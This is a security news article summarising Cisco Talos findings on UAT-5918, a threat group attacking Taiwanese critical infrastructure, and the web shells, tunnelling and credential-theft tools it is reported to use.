Researchers have identified a new threat actor, known as UAT-5918, which has been targeting critical infrastructure entities in Taiwan since at least 2023.
According to Cisco Talos researchers Jungsoo An, Asheer Malhotra, Brandon White, and Vitor Ventura, “UAT-5918 is a threat actor that is believed to be motivated by establishing long-term access for information theft, utilizing a combination of web shells and open-sourced tooling to conduct post-compromise activities and establish persistence in victim environments for information theft and credential harvesting.” You can read more about this here.
Additionally, the threat actor has targeted various other sectors, including information technology, telecommunications, academia, and healthcare.
UAT-5918 is assessed to be an advanced persistent threat (APT) group seeking to establish long-term persistent access in victim environments. The group’s tactics overlap with those of several Chinese hacking crews, including Volt Typhoon, Flax Typhoon, Tropic Trooper, Earth Estries, and Dalbit.
The attack chains used by UAT-5918 involve gaining initial access by exploiting N-day security vulnerabilities in unpatched web and application servers exposed to the internet. The group then drops various open-source tools to conduct network reconnaissance, system information gathering, and lateral movement.
UAT-5918’s post-exploitation tactics involve the use of Fast Reverse Proxy (FRP) and Neo-reGeorge to set up reverse proxy tunnels for accessing compromised endpoints via attacker-controlled remote hosts.
The threat actor has also been using tools like Mimikatz, LaZagne, and a browser-based extractor called BrowserDataLite to harvest credentials and gain deeper access to the target environment via RDP, WMIC, or Impact. Additionally, UAT-5918 uses Chopper web shell, Crowdoor, and SparrowDoor, the latter two of which have been previously used by another threat group called Earth Estries.
BrowserDataLite is designed to steal login information, cookies, and browsing history from web browsers. The threat actor also engages in systematic data theft by enumerating local and shared drives to find data of interest.
According to the researchers, “the activity that we monitored suggests that the post-compromise activity is done manually with the main goal being information theft. This also includes the deployment of web shells across any discovered sub-domains and internet-accessible servers to open multiple points of entry to the victim organizations.”
